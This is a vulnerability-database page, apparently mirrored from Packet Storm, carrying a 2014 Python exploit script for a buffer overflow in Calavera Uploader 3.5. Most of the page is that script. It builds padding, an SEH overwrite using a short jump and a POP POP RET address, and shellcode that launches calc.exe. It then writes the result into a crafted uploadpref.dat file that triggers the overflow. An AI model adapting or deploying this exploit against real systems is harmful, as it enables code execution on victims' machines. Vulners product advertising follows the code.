Lucene search
K

Calavera Uploader 3.5 Buffer Overflow

🗓️ 04 Mar 2014 00:00:00Reported by Daniel La CalaveraType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Calavera Uploader 3.5 Buffer Overflow by Daniel - La Calavera via email [email protected] for CracksLatinoS. Includes shellcode for calc.exe and uses POP POP RET

Code
`#exploit por Daniel - La Calavera  
#Email: [email protected]  
# Para CracksLatinoS  
  
#relleno  
  
rell = "\x41"* 477  
rell1 = "\x42"* 4000  
  
head = "\x41"* 8  
head += "\x0d\x0a\x31\x0d\x0a"  
head1 = "\x0d\x0a"  
head2 = "170.1.1.0"  
head2 +="\x0d\x0a"  
head2 +="\x22"  
head2 += "C:\Archivos2de2programa\Uploader!\Uploader!23151EXE"  
head2 +="\x22"  
  
  
# shellcode para calc.exe  
  
shellcode = "\x33\xD2\xB2\x50\x80\xF2\x55\x52\xC6\x45"  
shellcode += "\x31\x63\xC6\x45\x32\x61\xC6\x45\x33\x6C"  
shellcode += "\xC6\x45\x34\x63\xC6\x45\x35\x2E\xC6\x45\x36\x65"  
shellcode += "\xC6\x45\x37\x78\xC6\x45\x38\x65\x88\x45"  
shellcode += "\x39\x8D\x45\x31\x50\xB9\x31\x75\x66\x31"  
shellcode += "\x81\xF1\x69\x4D\x26\x31\xFF\xe1"  
  
# Next SHE  
Nshe = "\xeb\x06\x90\x90"  
# POP POP RETN  
PPR = "\x38\xbf\x40\x00"  
  
explo = (head + rell + Nshe + PPR + shellcode + rell1 + head1 + head2)  
arch = open ("uploadpref.dat", "w")  
  
arch.write(explo)  
arch.close  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation